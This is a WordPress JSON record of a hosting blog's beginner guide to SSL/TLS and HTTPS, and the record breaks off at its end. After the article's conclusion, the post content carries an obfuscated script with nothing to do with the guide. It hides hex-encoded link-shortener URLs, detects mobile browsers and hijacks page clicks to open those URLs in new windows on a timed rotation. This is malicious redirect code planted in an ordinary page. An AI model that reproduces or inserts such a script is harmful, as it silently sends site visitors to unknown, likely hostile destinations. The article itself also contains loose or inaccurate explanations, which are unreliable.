{"id":6025,"date":"2020-01-21T12:23:04","date_gmt":"2020-01-21T12:23:04","guid":{"rendered":"https:\/\/www.cloudhostworld.com\/blog\/?p=6025"},"modified":"2024-03-30T08:59:58","modified_gmt":"2024-03-30T08:59:58","slug":"guide-ssl-tls-https","status":"publish","type":"post","link":"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/","title":{"rendered":"Complete Guide To SSL\/TLS\/HTTPS"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"410\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/Guide-toSSLTLS-1.jpg\" alt=\"Guide-toSSL-TLS\" class=\"wp-image-6032\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/Guide-toSSLTLS-1.jpg 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/Guide-toSSLTLS-1-300x154.jpg 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/Guide-toSSLTLS-1-768x394.jpg 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n<p>\u00a0<\/p>\n<p>Internet security is becoming very critical in this age of technical advancements so &#8221; <em><strong>Complete Guide To SSL\/TLS\/HTTPS<\/strong><\/em> &#8221; came into existence.<\/p>\n<p>Irrespective of the scale of your business, you must opt for internet security in much the same way big companies and residential societies employ physical security. It not only makes you feel safer, but at the same time, it protects your most confidential information&#8217;s and your visitors; whenever they visit your website.<\/p>\n<p>In case of technology, it is not always, easy to stay updated about the latest software updates, although it should be a part of daily practice. For this reason only, many big businesses collaborate with leading internet security providers in the market.<\/p>\n<p>There are quite a few terminologies and technologies related to internet security. Moreover, here we will have a good look at them and try to understand them as simply as possible.<\/p>\n<p>Before we head off to internet security and the technologies related to it, let us first understand these terminologies that will come up time and again.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_83 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69ff60279e441\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69ff60279e441\"  aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Encryption\" >Encryption<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Decryption\" >Decryption<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Key\" >Key<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Browser\" >Browser<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#What_is_SSLTLS_and_HTTP\" >What is SSL\/TLS and HTTP<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#The_SSLTLS_Certificate\" >The SSL\/TLS Certificate<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Authentication_and_Verification\" >Authentication and Verification<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#Why_is_a_SSL_Certificate_necessary\" >Why is a SSL Certificate necessary ?<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#SSL_Explored\" >SSL Explored!<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.cloudhostworld.com\/blog\/guide-ssl-tls-https\/#When_and_where_to_use\" >When and where to use ?<\/a><\/li><\/ul><\/nav><\/div>\n<h2 id=\"encryption\"><span class=\"ez-toc-section\" id=\"Encryption\"><\/span><em><u>Encryption<\/u><\/em><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>It is the process of \u201c<strong>scrambling<\/strong>\u201d the original information into a meaningless and unrecognizable form. In this way, the information is transmitted safely to the intended person. The receiver can only read the original information after he or she has decoded the form.<\/p>\n<h2 id=\"decryption\"><span class=\"ez-toc-section\" id=\"Decryption\"><\/span><em><strong><u>Decryption<\/u><\/strong><\/em><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>This is the opposite of Encryption; i.e. the process of \u201c<strong>unscrambling<\/strong>\u201d the already encrypted information that was transmitted. The receiver needs to have the means of decrypting the massage or the key.<\/p>\n<h2 id=\"key\"><span class=\"ez-toc-section\" id=\"Key\"><\/span><strong><u>Key<\/u><\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Key or an algorithm is a mathematical formula that helps to encrypt a massage sent over the internet or decrypting it. Just as a lock with different combinations is hard to break, a key with a complex and longer encryption is tough to crack. Depending on its use and accessibility there are different types of keys.<\/p>\n<h2 id=\"browser\"><span class=\"ez-toc-section\" id=\"Browser\"><\/span><strong><u>Browser<\/u><\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-6027 aligncenter\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/browser.jpg\" alt=\"browser\" width=\"800\" height=\"410\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/browser.jpg 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/browser-300x154.jpg 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/browser-768x394.jpg 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<p>A browser is a software program or \u201c<strong>engine<\/strong>\u201d that you can use to access and browse (or search relevant information) on the internet. Most popular search engines are Microsoft Internet Explorer, Google Chrome, Mozilla Firefox, etc.<\/p>\n<h2 id=\"what-is-ssl-tls-and-http\"><span class=\"ez-toc-section\" id=\"What_is_SSLTLS_and_HTTP\"><\/span><strong>What is SSL\/TLS and HTTP<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>When it comes to internet and its security, the three most widely used seen acronyms are <em><strong>SSL\/TLS and HTTP<\/strong><\/em>. They seem almost interchangeable but they are not quite so.<\/p>\n<h2 id=\"the-ssl-tls-certificate\"><span class=\"ez-toc-section\" id=\"The_SSLTLS_Certificate\"><\/span><u>The SSL\/TLS Certificate<\/u><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><a href=\"https:\/\/www.cloudhostworld.com\/blog\/why-your-blog-need-an-ssl-certificate-cloud-host-world\/\" target=\"_blank\" rel=\"noopener noreferrer\"><em><strong>SSL stands for Secure Socket Layer.<\/strong><\/em><\/a>\u00a0 It is the standard technology employed for securing and safeguarding information transfer between two parties or servers. This helps to prevent hackers and cyber-thieves from intercepting, accessing, stealing and modifying the information between transfers by creating a secure communication link between the two servers. Every form of information can be sent via a secure link.<\/p>\n<p>An SSL certificate is nothing about a digital computer file (or maybe a small piece of code) with two major functions:<\/p>\n<ol>\n<li>\n<h3 id=\"authentication-and-verification\"><span class=\"ez-toc-section\" id=\"Authentication_and_Verification\"><\/span><strong><em>Authentication and Verification<\/em><\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><em>\u2192<\/em> An SSL certificate contains various information&#8217;s about the website owner. This information is visible to the visitor and they know that the website is genuine and not a fake. The green padlock beside the URL assures that the website is authenticated and valid.<\/p>\n<\/li>\n<li><strong><em>Data Encryption<\/em><\/strong> <em><em>\u2192<\/em><\/em>It is the most important function of the <em><strong>SSL certificate<\/strong><\/em>. By encrypting the information with a key, the information on the website becomes hard for cyber-criminals to access or intercept.<\/li>\n<\/ol>\n<p>The <em><strong>SSL certificate<\/strong> <\/em>is issued by a trusted Certificating Authority (CA). They employ quite strict rules of eligibility for an SSL certificate.<\/p>\n<p><em><strong>TLS stands for Transport Layer Security<\/strong><\/em> and is an updated and more secure version of SSL. Even though people still refer to their security certificate as SSL, the <em><strong>SSL<\/strong><\/em> has now become almost obsolete with <em><strong>TLS<\/strong><\/em> taking its place. A TLS has both the above functions only it is much more efficient.<\/p>\n<p><em><strong>Hyper Text Transfer Protocol<\/strong><\/em> is the full form of the acronym<em><strong> HTTP<\/strong><\/em>. As the name suggests it is a protocol used in the World Wide Web, to initiate communication between web servers and clients (browsers). It defines the formatting and transition, of massages, as well as the actions, the browsers and servers must undertake in response to various commands.<\/p>\n<p>Whenever a user enters an URL in the browser, it sends a <em><strong>HTTP<\/strong><\/em> command or request to the web server and directs it to fetch and transmit the intended web page. There is another protocol that controls how the www works; namely the formatting and display of web pages.<\/p>\n<p><em><strong>HTTPS<\/strong> <\/em>is a secured extension of HTTP, namely Hyper Text Transfer Protocol Secure. It appears in the address bar before the URL if and only if that website is SSL certified. The lock symbol beside it displays the identity of the website and its owner (business or personal).<\/p>\n<p>As you can see, <em><strong>SSL<\/strong><\/em> and <em><strong>HTTP<\/strong><\/em> goes hand-in-hand. This means that you cannot use one without the other; whenever you set up an SSL certificate, it means that you are configuring your website to transmit data using <em><strong>HTTPS<\/strong><\/em> and the URL is preceded by HTTPS; otherwise, it remains as HTTP.<\/p>\n<h3 id=\"why-is-a-ssl-certificate-necessary\"><span class=\"ez-toc-section\" id=\"Why_is_a_SSL_Certificate_necessary\"><\/span><strong>Why is a SSL Certificate necessary ?<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6028\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/sslcer.jpg\" alt=\"ssl certificate\" width=\"800\" height=\"410\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/sslcer.jpg 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/sslcer-300x154.jpg 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2020\/01\/sslcer-768x394.jpg 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<p>Wherever and whenever, sensitive information such as login credentials, payment informations like bank account number, etc. are transferred; there is an absolute need for security. It does not need to be said much. It is to be kept in mind that even if we say <em><strong>SSL<\/strong><\/em>, we must mean <em><strong>TLS<\/strong><\/em> as the former has been replaced by the later. However, here I will continue with SSL as it is still commonly used.<\/p>\n<p>The main goal of a <em><strong>SSL\/TLS certificate<\/strong><\/em> is to make sure that the information transmitted must is only accessible between the sender and receiver and no third party unless any one of them decides to share. Once the information leaves the sender\u2019s system it bounces off many devices on the internet before it lands on the indented receiver\u2019s system.<\/p>\n<p>There is always a chance that it may get intercepted with malicious intent. This is the reason why <em><strong>SSL<\/strong><\/em> exists and is necessary to have on your arsenal as it secures a communication link between the two parties and blocks everyone who should not get access to the information.<\/p>\n<h2 id=\"ssl-explored\"><span class=\"ez-toc-section\" id=\"SSL_Explored\"><\/span><strong>SSL Explored!<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We have seen what exactly an <em><strong>SSL certificate<\/strong><\/em> means and why it is necessary to have one. Now we will discuss how it works, how many different types of SSL there are, what benefits they bring and more.<\/p>\n<p><u>How does it work?<\/u><\/p>\n<p>An SSL encryption or certificate works in the same way as a lock and key works. You need the correct key to open the lock; similarly, you need the correct encryption algorithm to decode the information. For each SSL session, two keys are used:<\/p>\n<ol>\n<li><strong><em>A Public Key <\/em><\/strong><strong><em>\u2192 <\/em><\/strong>used to encrypt or scramble the information.<\/li>\n<li><strong><em>A Private Key <\/em><\/strong><strong><em>\u2192<\/em><\/strong> used to decrypt or unscramble the already coded information and restore the original information.<\/li>\n<\/ol>\n<p>Together, these two keys create an inimitable session key that is unique to each session.<\/p>\n<p>To issue a SSL certificate for a CA-verified entity means to issue it for a website server &amp; domain pair. Whenever an user enters the domain name of an <em><strong>SSL certified website<\/strong><\/em>, a connection or \u201c<em><strong>SSL Handshake<\/strong><\/em>\u201d occurs between the two parties and two keys mentioned above, which will be used to create a session key that will eventually be used to encrypt and decrypt the transferred data.<\/p>\n<p>One can always notice the change in the UI to indicate that a secure connection has been established between the two parties. At first, the information is requested and the session key is created to encrypt the information before transferring it.<\/p>\n<p>The information is then transmitted from the source (server) and reaches its destination (<em><strong>browser<\/strong><\/em>) after bouncing off numerous devices. Finally, on reaching its destination, the session key is used once again to decrypt the encoded information and restore it to its original form so that the user can view the information requested. This session key is valid for that particular session only.<\/p>\n<h2 id=\"when-and-where-to-use\"><span class=\"ez-toc-section\" id=\"When_and_where_to_use\"><\/span><u><em><strong>When and where to use <\/strong><\/em>?<\/u><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The shortest answer to this would be \u201cwhenever and wherever you need to transfer any sensitive data between the server and domain.\u201d However, there are other cases where it comes handy as well. Here we will see the cases where SSL certificate is absolutely necessary as well as useful:<\/p>\n<ol>\n<li><strong><em>Securing information transfer ?<\/em><\/strong> As I have said earlier, the most important function of the <em><strong>SSL certificate<\/strong><\/em> is to secure sensitive information between two parties. However information&#8217;s security does not only include that; there are other cases too here information needs to be secured:<\/li>\n<\/ol>\n<ul>\n<li>Between your website and the client\u2019s browser;<\/li>\n<li>Internal communication on corporate intranet;<\/li>\n<li>Email communications sent back and forth your network.<\/li>\n<\/ul>\n<ol start=\"2\">\n<li><strong><em>When you need authentication for your server ?<\/em><\/strong> It is not a big task nowadays to imitate a server itself. With an <em><strong>SSL certificate<\/strong><\/em>, you can verify your id and authenticity of your server.<\/li>\n<li><strong><em>To build trust ? <\/em><\/strong>Say you are running an e-commerce portal. Most of your communications with the clients will be via the internet and you would need to ask them for informations that may be sensitive to them. In such cases, a sense of trust is very important and an SSL certificate can help you to put good faith between you and your client.<\/li>\n<li><strong><em>To comply with industrial standards ?<\/em><\/strong> If you are involved in the finance or payment card industry (PCI), there are some standard guidelines you need to abide by most prominent of which is to maintain a base level security. An SSL certificate can help you a great deal in this regard.<\/li>\n<\/ol>\n<p>ALSO READ : <a href=\"https:\/\/www.cloudhostworld.com\/blog\/wordpress-seo-tips-2020\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>10 BEST WORDPRESS SEO TIPS<\/strong><\/a><\/p>\n<p>CONCLUSION<\/p>\n<p>In the world of online business and e-commerce, trust makes all the difference. For any online enterprise or <a href=\"https:\/\/www.cloudhostworld.com\/blog\/category\/ecommerce\/\" target=\"_blank\" rel=\"noopener noreferrer\"><em><strong>e-commerce<\/strong><\/em><\/a> website host, investing in technology to secure client data and requisites and build up trust with them is a very critical success factor. <em><strong>SSL certificates<\/strong><\/em> and trust marks are tools that help businesses in the endeavor. They are very effective and an absolute requirement for security reasons. Hope this article has been helpful to you.<br \/><\/p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x65\\x4a\\x58\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x49\\x33\\x63\\x373','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x7a\\x41\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x4a\\x4e\\x37\\x63\\x377','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x71\\x70\\x73\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x68\\x65\\x38\\x63\\x378','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x61\\x56\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x79\\x71\\x31\\x63\\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x72\\x69\\x69\\x34\\x63\\x334',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x64\\x57\\x39\\x63\\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"\u00a0 Internet security is becoming very critical in this age of technical advancements so &#8221; Complete Guide To&hellip;\n","protected":false},"author":21,"featured_media":6032,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_singular_sidebar":"","csco_page_header_type":"","csco_appearance_grid":"","csco_page_load_nextpost":"","csco_post_video_location":[],"csco_post_video_location_hash":"","csco_post_video_url":"","csco_post_video_bg_start_time":0,"csco_post_video_bg_end_time":0,"footnotes":""},"categories":[37],"tags":[231,66,69],"class_list":{"0":"post-6025","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ssl-certificate","8":"tag-https","9":"tag-ssl","10":"tag-tls","11":"cs-entry","12":"cs-video-wrap"},"_links":{"self":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/6025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v